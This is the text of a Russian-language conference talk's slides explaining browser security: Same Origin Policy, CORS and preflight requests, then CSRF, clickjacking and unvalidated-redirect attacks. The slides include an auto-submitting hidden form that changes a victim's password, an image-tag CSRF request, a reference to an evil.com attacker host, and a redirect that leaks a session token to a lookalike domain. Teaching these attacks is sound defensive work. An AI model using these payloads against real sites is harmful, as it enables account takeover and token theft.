ПОЧЕМУ БРАУЗЕРЫ
ОТДАЮТ ВАШИ
ДАННЫЕ ХАКЕРАМ?
Артем Зиненко <[email protected]>
XSS CSRF
UNVALIDATED REDIRECT CLICKJACKING
GET /index.html
GET /image.png
GET /index.html
GET /image.png
CROSS DOMAIN REQUESTS
site.com
GET /emails gmail.com
site.com
GET /emails gmail.com
Same Origin Policy
protocol://host:port
https://site.comhttp://site.com
https://a.site.comhttps://site.com:9090
CROSS ORIGIN RESOURCE SHARING
GETHEADPOST
METHODS
Accept
Accept-Language
Content-Language
Content-Type
HEADERS
application/x-www-form-urlencoded
multipart/form-data
text/plain
CONTENT-TYPE
var r = new XMLHttpRequest();
r.open('GET', ‘http://site2.com’, true);
r.send();
GET / HTTP/1.1
Host: site2.com
Origin:
http://site1.com/
HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://site1.com
[Data]
var r = new XMLHttpRequest();
r.open('GET', ‘http://site2.com’, true);
r.withCredentials = true;
r.send();
GET / HTTP/1.1
Host: site2.com
Origin:
http://site1.com/
Cookie: token=ab7…
HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://site1.com
Access-Control-Allow-Credentials: true
[Data]
PREFLIGHTED REQUESTS
var r = new XMLHttpRequest();
r.open('POST', ‘http://site2.com’, true);
r.setRequestHeader(‘Content-Type’,'application/json');
r.setRequestHeader('X-HEADER', 'lalala');
r.send(data);
OPTIONS / HTTP/1.1
Host: site2.com
Origin:
http://site1.com/
Access-Control-Request-Method: POST
Access-Control-Request-Headers: X-HEADER
HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://site1.com
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Headers: X-HEADER
POST / HTTP/1.1
Host: site2.com
Origin: http://site1.com/
X-HEADER: lalala
Content-Type: application/json
[Data]
HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://site1.com
[Data]
Cross-origin readsvar r = new XMLHttpRequest();
r.open('GET', ‘http://site2.com’, true);
r.withCredentials = true;
r.send();
Cross-origin writesvar c = new XMLHttpRequest();
c.withCredentials = true;
c.open("POST", ...);
c.setRequestHeader("Content-Type", “...”);
c.send(...);
Cross-origin embedding
$(‘…’).append(
‘<img src=“…”>’
);
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
POST /profilename: art
password:78330…
retypedPassword:2c84…
<form method=“POST”action=“http://service.com/profile”>
<input type=“hidden” name=“name” value=“[email protected]” />
<input type=“hidden” name=“password” value=“78330…” />
<input type=“hidden” name=“retypedPassword” value=“2c84…” />
</form>
<form method=“POST” action=“http://service.com/profile”>
<input type=“hidden” name=“name” value=“art”/>
<input type=“hidden” name=“password” value=“78330…”/>
<input type=“hidden” name=“retypedPassword” value=“2c84…”/>
</form>
<script>window.onload =function(){ …form.submit();}
</script>
POST /profilename, password
GET evil.com
Cross Site Request
FORGERY
POST /useremail: [email protected]
<img src=“https://.../confirm?code=67a50…” />
UNVALIDATED REDIRECT
https://site.com/login?back=https%3A%2F%2Fqqq.site.com
SUBDOMAIN
HTTP/1.1 302 Found
Location: https://qqq.site.com/
Set-Cookie:token=djnD…; domain=.site.com;
https://site.com/login?back=https%3A%2F%2Fqqq-site.com
ANOTHER DOMAIN
HTTP/1.1 302 Found
Location: https://qqq-site.com/?token=djnD…
https://speakerdeck.com/ar7z1/happydev-2015